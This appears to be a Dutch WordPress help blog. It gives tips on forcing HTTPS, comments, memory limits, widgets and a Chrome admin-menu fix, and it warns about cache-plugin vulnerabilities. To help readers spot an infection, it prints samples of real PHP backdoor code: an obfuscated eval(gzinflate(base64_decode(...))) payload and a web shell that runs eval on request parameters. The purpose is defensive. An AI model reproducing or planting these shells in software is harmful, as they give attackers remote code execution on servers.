SSL forceren via .htaccess (HTTPS)

Je kent het wel.. Net een SSL-certificaat gekocht & geinstalleerd, maar je komt niet uit bij het groene slotje op de website… 🙁

Dit komt vaak omdat er niet wordt doorverwezen naar HTTPS.
Gelukkig is dit vrij makkelijk op te lossen via .htaccess.

.htaccess is een bestandje wat standaard wordt aangemaakt door WordPress, dus ook jij hebt deze op uw website staan.
Bewerk het bestand en plak het volgende stukje code er bij in:

RewriteCond %{HTTPS} off
RewriteRule .* https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule .* https://www.%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

Sla vervolgens uw .htaccess op en je zult zien dat de website automatisch doorgestuurd wordt naar HTTPS.

Hoe schakel ik reacties uit?

Per pagina of bericht is ingesteld of er reacties achterlaten mogen worden. Wil je het voor alle pagina’s uitzetten, ga dan naar Berichten > Alle berichten. Ga met je muis op een bericht staan en klik vervolgens op “Snel bewerken”. Hier kan je het vakje “Reacties toestaan” uitvinken.

reactiestoestaan

Om dit ook uit te schakelen voor alle toekomstige artikelen, ga naar Instellingen > Reacties. Hier vink je dan uit “Sta toe dat bezoekers kunnen reageren op nieuwe artikelen”.

Hoe verhoog ik de memory limit van WordPress?

Het geheugen limiet kan op verschillende manieren ingesteld of beperkt zijn. Aan de hostingkant kan het gelimiteerd zijn via php.ini maar WordPress zelf zet standaard ook een memory limiet.

De memory limit van WordPress wordt bepaald in een bestand default-constants.php. Je vindt dit bestand in:

/wp-includes/default-constants.php

Bijna bovenaan staat vervolgens deze code:

if ( is_multisite() ) {
define('WP_MEMORY_LIMIT', '64M');
} else {
define('WP_MEMORY_LIMIT', '40M');
}

Pas hier de 40M aan naar 128M. Als het een multisite betreft pas je de 64M aan naar 256M.

Als het geheugen nog niet is vergroot kijk dan naar de instellingen in je php.ini bestand.

Hoe toon je de laatste reacties in de sidebar?

De sidebar kan meestal beheerd worden met widgets. Ga naar de wp-admin en navigeer naar Weergave en dan Widgets.

Nu zie je links alle beschikbare widgets, en rechts de beschikbare widgetruimtes. In het standaard twentysixteen thema is er één widgetruimte. In jouw thema kunnen er meerdere zijn.

Als je weet in welke widgetsruimte de widget moet komen, zoek dan de widget op in de lijst beschikbare widgets. Vervolgens sleep je de widget in de widgetruimte op de plek waar je hem wilt hebben. In dit geval sleep ik de widget naar de middelste positie:

widgetsruimte

Zodra je hem geplaatst hebt kan je de widget instellen. De “recente reacties” widget kan je een eigen titel geven én een limiet. Zo kan je bijvoorbeeld de laatste drie reacties tonen.

recentereacties

Als je op Opslaan hebt geklikt kan je op de voorkant kijken hoe je widget er uit ziet. Bij mij ziet hij er zo uit:

laatstereactieswidget

Verschijnen er geen laatste reacties op je blog? Kijk dan of je hem in de juiste widgetruimte geplaatst hebt en of er überhaupt al goedgekeurde reacties zijn op je blog.

Een gehackte WordPress schoonmaken

Via mijn webhosting bedrijf KeurigOnline krijg ik vaak de vraag om de klant uit de brand te helpen; de website is gehackt en de bouwer van de website weet er geen raad mee. Het opruimen van een website is dan ook niet eenvoudig. Zonder SSH toegang is het al bijna onbegonnen werk, helemaal als er meerdere domeinnamen in hetzelfde account staan.

Omdat de domeinen in één account elkaar kunnen infecteren is het vaak niet te doen om alles tegelijk te doen. Want voordat je op de helft bent met schoonmaken zijn er in de eerste helft alweer nieuwe backdoors geplaatst. Daarom is de enige oplossing vaak om alles uit elkaar te trekken. De domeinen moeten één voor één geïsoleerd en totaal opgeschoond worden.

In deze post zal ik mijn werkwijze beschrijven hoe ik een WordPress isoleer, schoonmaak en veilig houd. Ik hoop dat het in één keer goed gaat 🙂

Continue Reading “Een gehackte WordPress schoonmaken”

WP-admin menu bug in Chrome

Ook last van het probleem in Chrome 45 dat het admin menu begint te flippen? Je kan het oplossen door het menu in- en uit te vouwen.

Als je het probleem permanent wil oplossen kan je mijn eerste officële plug-in installeren. Hij voegt alleen maar deze regel toe maar het lost wel het probleem op:

if ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Chrome/45' ) !== false ) add_action('admin_head', create_function('', "echo \"<script type='text/javascript'>jQuery(window).load(function(){jQuery('#adminmenuwrap').hide().show(0);});</script>\";") );

De plug-in vind je hier.

Wil je weten hoe je een plug-in moet installeren? Kijk dan in de handleiding: Hoofdstuk 4: Plug-ins installeren

Belangrijk: Update W3 Total cache of WP Super Cache

Via dit artikel werden we gewezen op de kwetsbaarheden die zijn gevonden in de twee grootste cache plugins:

  • W3 Total cache
  • WP Super Cache

In beide plugins was het mogelijk om PHP code uit te voeren via de standaard reageer functionaliteit. Iets waarmee kwaadwillenden eenvoudig backdoor scripts (of zogenoemde shells) kunnen plaatsen waarna ze vrije toegang hebben tot alle bestanden in je webhostingaccount.

Waarom zouden ze mij willen hacken?

In de meeste gevallen is een dergelijke hack niets persoonlijks. Vaak kijken ze niet eens naar de bestanden omdat het proberen en inbreken volledig geautomatiseerd is.

Maar wat doen ze eigenlijk zodra ze toegang hebben? Een paar opties:

Spam versturen

Spam versturen is nog steeds lucratief. Als ze jouw webhosting accountje met goede reputatie kunnen gebruiken om tien of honderdduizenden berichten te sturen, dan doen ze dat maar al te graag.

Virus verspreiden

Door een JavaScript-code in te brengen in jouw html/php pagina’s worden al jouw bezoekers “onder water” doorgestuurd naar een malafide code die ergens anders staat. Door deze weer up te daten kunnen ze gerichte malware of virussen proberen te injecteren.

Onderdeel van een Botnet maken

Je hoort de laatste tijd veel nieuws over DDoS-aanvallen. Dit zijn aanvallen die komen vanaf botnets. Het kan zijn dat jouw hostingaccount ook onderdeel uitmaakt van zo’n Botnet en deel uit maakt van zo’n DDoS aanval.

Backdoors inbouwen

Ze bouwen vaak ook een extra backdoor in, dus een extra achterdeur. Als jij denkt dat je alles hebt opgeruimd hebben ze vaak nog een deur op een kier gezet om dezelfde trucjes gewoon weer uit te halen. Dus dan begint het weer met het plaatsen van een shell, en daarna kiezen ze weer één of meerdere van bovenstaande opties. Wat ik vaak zie is dat de standaard COPYWRIGHT.PHP van WordPress wordt aangepast naar een backdoor script.

Ik gebruik één van de twee cache plugins. En nu?

Updaten! Zo snel mogelijk een update doen en anders die plugins helemaal uitzetten. Het is een kwestie van tijd voordat je WordPress installatie ook gehackt wordt.

Hoe kom ik er achter of mijn WordPress installatie geïnfecteerd is?

Als je inzicht hebt in je reacties, en je hebt niets vreemds gezien, dan is er waarschijnlijk ook niets aan de hand.

Als je in de mappen van je WordPress installatie kijkt kan je vaak aan de data al zien of er gerommeld is. Als alle data nog afstammen van het moment dat je WordPress hebt geïnstalleerd of hebt geupdate, dan is er niets aan de hand. Maar als je ziet dat belangrijke bestanden op de datum van vandaag of gisteren staan, zonder dat je zelf iets hebt gedaan, dan is er iets mis.

Open de .php bestanden met zo’n afwijkende datum en zoek naar lange onleesbare codes, zoals:

eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1ClVJ3Z+F/zdnM9Znv1X55tFYH9f1kVS1n993+iiorDYWviEIA4GgnspGTd37DP+uVE1IvRZQH/8lxft4uqCHokTtUAUBBGsDucAXI8n7f0Gp2sYXkKYBkAcGBdZhWZlDcBIvb5oXFZ/s7p5ksrXsZ29EcHiFDq/lMgav4VLeqqTF6tPtzIWBvTXvgTNKjXFgqmoXa80E4ZCk9xbvNPzhDledODU1PHct9J6vOtiK6fgdTbBmK3E47Aa/URB24tldhtEe46TjqpMb4DBGXMo29rpii3qhDTZIpMcB1xBok332BjccfPXq0QsZU/g4eapBxT5git1rGdKtwf1rt9OOicc/hTlpeFmEjRRkWGWTJTkCol0X4AuwJSfFhtfP5dOgn561il+wkzkqCG9dfT9zqc274veIeSd41CxUIvH')));

 $dcawl = "d410cf2db81b72a00493e14ec542b3f"; if(isset($_REQUEST['eujjfr'])) { $eoetbln = $_REQUEST['eujjfr']; eval($eoetbln); exit(); } if(isset($_REQUEST['jqsjw'])) { $zcxdhege = $_REQUEST['sjjcsp']; $ltipnkb = $_REQUEST[

Haal deze codes er uit. Maar nog beter: herinstalleer de bestanden van WordPress via de knop “Opnieuw installeren”.

Er zijn ook mooie plugins ter beveiliging en controle van je WordPress installatie. Bijvoorbeeld BulletProof.

Hoe kan ik een contactformulier maken?

Een contactformulier maken is zo klaar als je gebruik maakt van een plugin. Er zijn een heleboel plugins die dit verzorgen maar ik raad Contact Form 7 aan, van Takayuki Miyoshi.

  • Ga naar Plugins > Nieuwe Plugin
  • Zoek op “contact form 7
  • Klik op “Nu Installeren”, Ok, en daarna op “Plugin activeren”
  • Ga links in het menu naar “Contact”
  • Kopieer de code onder “Shortcode” en kopieer deze naar je klembord
  • Maak een nieuwe pagina aan of plak de code in een bestaande pagina

Als het goed is staat er nu een volledig werkend contactformulier op de aangemaakte pagina.

De velden van het contactformulier kunnen aangepast worden via “bewerken”. Let er op dat je wel de velden die je gebruikt ook verwekt in de e-mail template er onder. Door de knop “Tag aanmaken” te gebruiken wordt dit uitgelegd.

Hoe kan ik WordPress gratis testen?

Als je gratis en vrijblijvend WordPress wilt testen, om wat voor reden dan ook, dan kan je vanaf nu terecht bij WP Sandbox.

Het is een ideale oplossing voor thema ontwikkelaars, plug-in schrijvers en mensen die op zoek zijn naar een nieuwe webhostingprovider om zaken mee te doen.